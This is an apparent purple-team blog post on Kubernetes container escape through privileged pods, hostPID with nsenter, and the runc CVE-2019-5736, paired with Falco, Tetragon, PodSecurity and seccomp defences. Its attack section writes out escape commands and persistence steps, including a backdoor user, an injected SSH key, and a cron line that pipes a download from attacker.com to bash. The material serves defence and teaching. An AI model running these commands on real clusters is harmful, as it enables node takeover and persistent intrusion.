What is purple team security → OWASP Top 10 mapped to cloud infrastructure → Cloud security breaches 2020–2025 → Broken access control in AWS → MFA fatigue attacks → CI/CD secrets exposure → SSRF to cloud metadata → Kubernetes Container Escape
TL;DR
- Kubernetes container escape is OWASP A04 + A05: a container deployed with
--privileged,hostPID, orhostNetworkis not meaningfully isolated from the host — two commands can produce a root shell on the node - The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp.
--privilegedremoves those boundaries — the kernel sees no difference between the container and the host - Three primary escape paths: privileged container with host device access,
hostPID+nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec - Detection requires kernel-level visibility: Falco fires on privilege container exec; Tetragon traces
nsenterandmountsyscalls at the point of the kernel hook, not a process name check that can be evaded - The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level — policy that blocks
--privileged,hostPID,hostNetwork, and mounts before a pod ever schedules - Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane
OWASP Mapping: A04 Insecure Design —
--privilegedplaced in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.
The Big Picture
┌─────────────────────────────────────────────────────────────────────────┐
│ KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE │
│ │
│ ┌──────────────────────────────────────────────────────────────┐ │
│ │ KUBERNETES NODE │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (--privileged) │ │ │
│ │ │ │ │ │
│ │ │ web app ──▶ exploit ──▶ shell in container │ │ │
│ │ │ │ │ │ │
│ │ │ PATH 1: mount /dev/sda1 │ │ │ │
│ │ │ ──────────────────────── ▼ │ │ │
│ │ │ chroot /mnt/host → root shell on node │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (hostPID=true) │ │ │
│ │ │ │ │ │
│ │ │ PATH 2: nsenter -t 1 -m -u -i -n -p -- bash │ │ │
│ │ │ ─────────────────────────────────────────────────▶ │ │ │
│ │ │ root shell in host PID 1 namespaces │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌───────────────────────────────────────────────────────┐ │ │
│ │ │ Container (runc CVE) │ │ │
│ │ │ │ │ │
│ │ │ PATH 3: overwrite /proc/self/exe during runc exec │ │ │
│ │ │ ─────────────────────────────────────────────────▶ │ │ │
│ │ │ arbitrary code execution as root on node │ │ │
│ │ └───────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ Node root → kubectl access → cluster-admin via node creds │ │
│ └──────────────────────────────────────────────────────────────┘ │
│ │
│ DETECTION LAYER │ STRUCTURAL FIX │
│ Falco / Tetragon │ PodSecurity Restricted │
│ mount syscall hooks │ RuntimeClass (gVisor/Kata) │
│ audit logs │ Seccomp + no-new-privileges │
└─────────────────────────────────────────────────────────────────────────┘
Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.
The Incident: –privileged “Just for Debugging”
A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds --privileged: true to the pod spec to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The --privileged flag stays in the manifest when staging gets promoted to production.
Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.
Inside the container, two commands:
mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.
The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.
This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.
Why the Kernel Doesn’t Know About Kubernetes
Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.
Kernel isolation comes from:
Linux namespaces (PID, net, mount, IPC, UTS, user)
├── Created by container runtime (containerd, crio)
├── Container processes run inside these namespaces
└── From inside: host PIDs, host network, host filesystem are not visible
cgroups
├── Limit CPU, memory, and device access per container
└── Prevent runaway resource consumption and limit device access scope
seccomp profiles
├── Filter system calls the container is allowed to invoke
└── Block ptrace, mount, CAP_SYS_ADMIN and other privileged syscalls
Capabilities
├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
└── --privileged grants ALL capabilities + disables seccomp + disables AppArmor
--privileged removes all three layers simultaneously. It grants every capability, disables the default seccomp filter, and disables AppArmor confinement. A privileged container is effectively a process running on the host with a different filesystem view — and with mount, you can fix even the filesystem view.
Red Phase: The Three Escape Paths
Path 1: –privileged Container
A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.
Check if the current container is privileged:
# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff
# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged
Full escape sequence:
# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)
# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
# sda 8:0 0 80G 0 disk
# ├─sda1 8:1 0 79G 0 part /
# └─sda2 8:2 0 1G 0 part [SWAP]
# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host
# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys
# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)
# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/
What persistence looks like from node root:
# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor
# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
>> /mnt/host/etc/cron.d/maintenance
Path 2: hostPID / hostNetwork Escape
hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.
With hostPID enabled, nsenter produces a host root shell without mounting anything:
# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node
# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash
# Now running in host namespaces
hostname # shows node hostname, not container hostname
mount | grep " / " # shows host root mount, not container overlay
id # uid=0(root) gid=0(root)
nsenter — a Linux utility that enters the namespaces of an existing process. With
-t 1it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.
hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.
Path 3: runc CVE Escape (CVE-2019-5736)
CVE-2019-5736 is a different attack class — it does not require a misconfiguration in the pod spec. It exploits a race condition in the runc container runtime itself.
The mechanism:
1. Attacker controls a container image
2. Image's entrypoint is a symlink: /proc/self/exe → /runc (or similar path)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc reads /proc/self/exe to find its own binary path during exec
5. Attacker's process in container has a brief window to overwrite /proc/self/exe
6. Race condition: attacker overwrites the runc binary on the host with malicious binary
7. On next runc exec, malicious binary runs as root on the host
The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:
# Simplified bpftrace detection of /proc/self/exe writes (safe to run as read):
# This shows the pattern — Tetragon implements this as a continuous policy
bpftrace -e '
tracepoint:syscalls:sys_enter_write {
// Track write() calls where the fd points to /proc/self/exe
// In production: Tetragon handles this at the LSM hook level
printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20
Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the race condition. The practical implication: node patching is the only fix for runc-class CVEs — pod security policy cannot prevent a vulnerability in the container runtime itself.
Safe Simulation: Audit Your Cluster Before an Attacker Does
These commands are read-only and safe to run against any cluster you have kubectl access to:
# Find all pods running with --privileged
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.containers[].securityContext.privileged == true) |
[.metadata.namespace, .metadata.name,
(.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
join(" / ")' | \
sort -u
# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.hostPID == true or .spec.hostNetwork == true) |
[.metadata.namespace, .metadata.name,
(if .spec.hostPID then "hostPID" else "" end),
(if .spec.hostNetwork then "hostNetwork" else "" end)] |
join(" / ")' | \
grep -v "/$" | \
sort -u
# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
jq -r '.items[] |
select(.spec.volumes[]?.hostPath != null) |
[.metadata.namespace, .metadata.name,
(.spec.volumes[] | select(.hostPath != null) |
.name + "→" + .hostPath.path)] |
join(" / ")' | \
sort -u
# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
jq -r '.items[] |
select(.spec.template.spec.containers[].securityContext.privileged == true) |
[.metadata.namespace, .metadata.name] | join("/")' | \
sort -u
Blue Phase: eBPF Detection
Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.
Falco: Privileged Container and Mount Detection
# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml
# Rule 1: Privileged container started
- rule: Privileged Container Started
desc: >
A container running with --privileged was started.
This removes all capability and seccomp restrictions.
condition: >
container.privileged = true and
evt.type = execve and
container.id != host
output: >
Privileged container started
(user=%user.name user_uid=%user.uid
command=%proc.cmdline
container_id=%container.id
container_name=%container.name
image=%container.image.repository:%container.image.tag
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: WARNING
tags: [container, privilege-escalation, OWASP-A05]
# Rule 2: Mount syscall from inside a container
- rule: Container Mount Syscall
desc: >
A process inside a container invoked mount().
In a non-privileged container this fails; in a privileged container
it succeeds and may be mounting host block devices.
condition: >
evt.type = mount and
container.id != host and
not proc.name in (container_runtime_processes)
output: >
Mount syscall from container
(user=%user.name
command=%proc.cmdline
mount_source=%evt.arg.source
mount_target=%evt.arg.target
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: ERROR
tags: [container, privilege-escalation, OWASP-A04]
# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
desc: >
nsenter or chroot executed from within a running container.
nsenter with -t 1 enters host namespaces directly.
condition: >
evt.type = execve and
container.id != host and
proc.name in (nsenter, chroot)
output: >
nsenter/chroot executed in container
(user=%user.name
command=%proc.cmdline
parent=%proc.pname
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: ERROR
tags: [container, privilege-escalation, T1611]
# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
desc: >
A process inside a container is reading /proc entries for PIDs
that don't belong to it — indicates hostPID=true and enumeration.
condition: >
evt.type = openat and
fd.name startswith /proc/ and
fd.name endswith /status and
container.id != host and
not fd.name startswith /proc/self
output: >
Container reading host process status
(proc=%proc.cmdline fd=%fd.name
container_id=%container.id
namespace=%k8s.ns.name pod=%k8s.pod.name)
priority: WARNING
tags: [container, discovery, T1057]
Tetragon: TracingPolicy for nsenter and Mount Syscalls
Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco which uses a single tracepoint aggregation model, Tetragon can enforce at the kernel level — it can block a syscall before it completes, not just alert after the fact.
# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
name: container-escape-detection
namespace: kube-system
spec:
kprobes:
# Hook 1: sys_mount — detect any mount() call from a container process
- call: "sys_mount"
return: false
syscall: true
args:
- index: 0
type: "string" # source device (e.g. /dev/sda1)
- index: 1
type: "string" # target mount point
- index: 2
type: "string" # filesystem type
selectors:
# Only fire for container processes (not the container runtime itself)
- matchNamespaces:
- namespace: Pid
operator: NotIn
values:
- "host_pid_ns" # Replace with actual host PID NS value
matchActions:
- action: Post # Post = log; change to Sigkill to enforce
# Hook 2: __x64_sys_execve for nsenter binary
- call: "__x64_sys_execve"
return: false
syscall: true
args:
- index: 0
type: "string" # filename being executed
selectors:
- matchArgs:
- index: 0
operator: Postfix
values:
- "/nsenter"
matchActions:
- action: Post
# Hook 3: write to /proc/self/exe — runc CVE class indicator
kprobes:
- call: "vfs_write"
return: false
syscall: false
args:
- index: 0
type: "file"
selectors:
- matchArgs:
- index: 0
operator: Postfix
values:
- "/proc/self/exe"
matchActions:
- action: Sigkill # Block immediately — no legitimate use case for this write
bpftrace: Quick Node-Level Validation
Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:
# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers
bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
printf("%-8d %-20s %-30s -> %-30s type=%s\n",
pid, comm,
str(args->dev_name), // source device
str(args->dir_name), // mount target
str(args->type)); // filesystem type
}
' 2>/dev/null
# Sample output:
# PID COMM SOURCE TARGET TYPE
# 38471 bash /dev/sda1 /mnt/host ext4
# 38471 and comm=bash from inside a container = escape attempt in progress
# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
if (str(args->filename) == "/usr/bin/nsenter" ||
str(args->filename) == "/bin/nsenter") {
printf("nsenter called: pid=%d ppid=%d comm=%s\n",
pid, curtask->real_parent->pid, comm);
}
}
' 2>/dev/null
What Kubernetes Audit Logs Show (and What They Miss)
Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.
# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log pod creation at RequestResponse level (captures full spec)
- level: RequestResponse
resources:
- group: ""
resources: ["pods"]
verbs: ["create", "update", "patch"]
# Log exec into pods — this is the entry point for escape attempts
- level: RequestResponse
resources:
- group: ""
resources: ["pods/exec"]
verbs: ["create"]
# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
jq -r '[
.requestReceivedTimestamp,
.user.username,
.objectRef.namespace + "/" + .objectRef.name,
"privileged=true"
] | join(" | ")'
# Or via kubectl (if audit log backend is configured)
kubectl get events -A --field-selector reason=Created \
-o json | \
jq -r '.items[] |
select(.message | contains("privileged")) |
[.metadata.namespace, .involvedObject.name, .message] |
join(" / ")'
The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pod/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.
Purple Phase: Structural Fixes
Fix 1: PodSecurity Admission — Enforce Restricted Profile
PodSecurity admission (built into Kubernetes 1.25+, replacing PodSecurityPolicy) enforces security profiles at the namespace level. The Restricted profile blocks --privileged, hostPID, hostNetwork, hostPath volumes, and requires dropping all capabilities.
# Enforce the Restricted PodSecurity profile on a namespace
# This blocks any pod that doesn't meet the criteria from scheduling
apiVersion: v1
kind: Namespace
metadata:
name: production
labels:
# enforce: pod is rejected at admission if spec violates Restricted
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/enforce-version: latest
# audit: violations are logged but not rejected (useful for rollout)
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/audit-version: latest
# warn: user gets a warning but pod is allowed (for migration)
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
What Restricted profile blocks (relevant to escape paths):
# These settings are REQUIRED by Restricted — apply them explicitly
# to avoid the admission webhook rejecting your workloads
securityContext:
# Pod-level
runAsNonRoot: true
seccompProfile:
type: RuntimeDefault # or Localhost with a custom profile
containers:
- securityContext:
allowPrivilegeEscalation: false
privileged: false # blocks Path 1
capabilities:
drop: ["ALL"] # no CAP_SYS_ADMIN, no CAP_NET_ADMIN
add: [] # add only what is specifically required
readOnlyRootFilesystem: true # reduces attacker persistence options
# Pod spec — blocked by Restricted
spec:
hostPID: false # must be false (blocks Path 2)
hostNetwork: false # must be false
hostIPC: false # must be false
volumes: # hostPath volumes blocked
- name: app-data
emptyDir: {} # emptyDir, configMap, secret allowed; hostPath not
Rollout approach for existing clusters:
Start with warn mode on all namespaces, identify violations, remediate, then promote to enforce:
# Label all non-system namespaces with warn mode first
kubectl get namespaces -o json | \
jq -r '.items[] |
select(.metadata.name | test("^(kube-system|kube-public|kube-node-lease)$") | not) |
.metadata.name' | \
while read ns; do
kubectl label namespace "$ns" \
pod-security.kubernetes.io/warn=restricted \
pod-security.kubernetes.io/warn-version=latest \
--overwrite
echo "Labeled $ns"
done
# After a deployment cycle, check for warnings in admission logs
# Look for pods that would be rejected under enforce mode
kubectl get events -A --field-selector reason=FailedCreate \
-o json | jq -r '.items[] | select(.message | contains("violates PodSecurity"))'
Fix 2: RuntimeClass — Hardware-Level Isolation for Untrusted Workloads
For workloads that cannot run under Restricted profile (CNI plugins, monitoring agents, specific DaemonSets), the alternative is a stronger isolation boundary: a hypervisor-level runtime.
gVisor and Kata Containers intercept system calls at a layer between the container and the Linux kernel, so a container escape exploiting a kernel vulnerability or a privileged mount hits the sandbox boundary, not the host kernel.
# Define a RuntimeClass for gVisor (runsc)
# Requires gVisor installed on nodes with the runsc runtime handler
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: gvisor
handler: runsc # must match the handler name in containerd/crio config
scheduling:
nodeSelector:
runtime.gvisor: "true" # only schedule on nodes that have gVisor
---
# Use the RuntimeClass in a pod spec
apiVersion: v1
kind: Pod
metadata:
name: untrusted-workload
spec:
runtimeClassName: gvisor # all syscalls go through gVisor's sentry
containers:
- name: app
image: untrusted-image:latest
# Kata Containers: hardware VM boundary, not just a user-space syscall interceptor
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
name: kata-containers
handler: kata-qemu
For operators: gVisor and Kata Containers have compatibility trade-offs. Not all syscalls are supported in gVisor (it implements a subset of the Linux ABI). Kata Containers have higher startup latency (VM boot time). Benchmark your specific workload before enforcing these on production-critical pods.
Fix 3: Seccomp Profile — Block the Syscalls That Enable Escape
Even without gVisor, a custom seccomp profile that explicitly denies mount, unshare, and clone with namespace flags closes the primary escape syscall surface.
{
"defaultAction": "SCMP_ACT_ERRNO",
"architectures": ["SCMP_ARCH_X86_64", "SCMP_ARCH_X86", "SCMP_ARCH_X32"],
"syscalls": [
{
"names": [
"accept", "accept4", "access", "arch_prctl",
"bind", "brk", "capget", "capset",
"chdir", "chmod", "chown", "clock_gettime",
"clone",
"close", "connect",
"dup", "dup2", "dup3",
"execve", "exit", "exit_group",
"fchmod", "fchown", "fcntl",
"fstat", "fstatfs", "fsync",
"futex", "getcwd", "getdents64",
"getegid", "geteuid", "getgid", "getgroups",
"getpeername", "getpid", "getppid",
"getrlimit", "getsockname", "getsockopt",
"gettid", "gettimeofday", "getuid",
"inotify_add_watch", "inotify_init1",
"listen", "lseek", "lstat",
"madvise", "mmap", "mprotect",
"munmap", "nanosleep",
"open", "openat",
"pipe", "pipe2", "poll", "ppoll",
"prctl", "pread64", "pwrite64",
"read", "readlink", "readv",
"recvfrom", "recvmsg", "recvmmsg",
"rename", "rt_sigaction", "rt_sigprocmask",
"rt_sigreturn", "sched_getaffinity",
"select", "sendfile", "sendmsg", "sendto",
"set_robust_list", "set_tid_address",
"setgid", "setgroups", "setuid",
"setsockopt", "shutdown",
"socket", "socketpair",
"stat", "statfs", "symlink",
"tgkill", "time", "timerfd_create",
"timerfd_settime", "truncate",
"uname", "unlink", "unlinkat",
"wait4", "waitid",
"write", "writev"
],
"action": "SCMP_ACT_ALLOW"
}
]
}
Apply via pod spec:
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: "container-escape-block.json"
# Profile must be in /var/lib/kubelet/seccomp/ on each node
# Distribute the seccomp profile to all nodes via DaemonSet
# Example using a DaemonSet that copies the profile file on startup
# (or use the built-in RuntimeDefault which blocks ~300 dangerous syscalls)
# RuntimeDefault blocks: mount, unshare, clone with new-ns flags,
# add_key, keyctl, request_key, pivot_root — adequate for most workloads
spec:
securityContext:
seccompProfile:
type: RuntimeDefault
Fix 4: Network Policy — Contain the Blast Radius After Escape
Even if a container escapes to the node, a network policy that prevents the escaped process from reaching the Kubernetes API server limits what the attacker can do with node credentials.
# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: block-api-server-egress
namespace: production
spec:
podSelector: {} # applies to all pods in namespace
policyTypes:
- Egress
egress:
# Allow DNS
- ports:
- protocol: UDP
port: 53
# Allow application traffic (customize per workload)
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: production
# Explicitly: no rule allowing egress to control plane CIDR
# This is a deny-by-absence — egress to control plane falls through to default deny
# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: production
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
# No ingress or egress rules = deny all
# Add specific rules above this as needed
Fix 5: Node Isolation — Co-location Risk
An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.
# Use node selectors, taints, and tolerations to separate workload tiers
# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule
# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes
# Pod spec for internet-facing workload — only schedules on public nodes
spec:
nodeSelector:
workload-tier: public
tolerations: [] # No toleration for sensitive node taint
# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
nodeSelector:
workload-tier: sensitive
tolerations:
- key: workload-tier
operator: Equal
value: sensitive
effect: NoSchedule
⚠ Production Gotchas
Legitimate workloads that require –privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.
Seccomp Restricted blocks some monitoring agents. The default Restricted seccomp profile blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.
runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.
hostPath volumes are a partial equivalent to –privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Restricted blocks hostPath entirely; Baseline allows it. Audit for hostPath volumes separately from --privileged.
RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.
Quick Reference
| Escape Path | Precondition | Detection Signal | Structural Fix |
|---|---|---|---|
| Privileged container → mount | privileged: true |
Falco: mount syscall from container; Tetragon: sys_mount kprobe | PodSecurity Restricted enforce; seccomp blocks mount |
| hostPID + nsenter | hostPID: true |
Falco: nsenter exec in container; audit log: pod creation with hostPID | PodSecurity Restricted; blocks hostPID |
| hostNetwork + IMDS | hostNetwork: true |
CloudTrail: IMDSv1 call from unexpected source | Enforce IMDSv2 hop limit 1; PodSecurity Restricted |
| runc CVE (CVE-2019-5736) | Unpatched runc | Tetragon: vfs_write to /proc/self/exe | Patch runc/containerd; use RuntimeClass (gVisor) |
| hostPath volume mount | hostPath to sensitive path | Falco: sensitive host file access; PodSecurity audit | PodSecurity Restricted (blocks hostPath) |
| Escaped → API server | Node credential access | Audit log: API calls from node IP at unexpected time | Network policy blocking node→API server egress |
Key Takeaways
- Kubernetes container escape starts at the kernel:
--privileged,hostPID, andhostNetworkremove Linux namespace and cgroup isolation — the Kubernetes API cannot prevent what happens inside a process that runs with those flags - Two commands from privileged container to root on the node:
mount /dev/sda1 /mnt/hostandchroot /mnt/host /bin/bash— this is not a sophisticated exploit, it is a default kernel behavior - eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
- PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes — it blocks
--privileged,hostPID,hostNetwork, and hostPath volumes before a pod schedules - runc-class CVEs are independent of configuration — node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
- Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials
What’s Next
Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.
Get EP09 in your inbox when it publishes → subscribe at linuxcent.com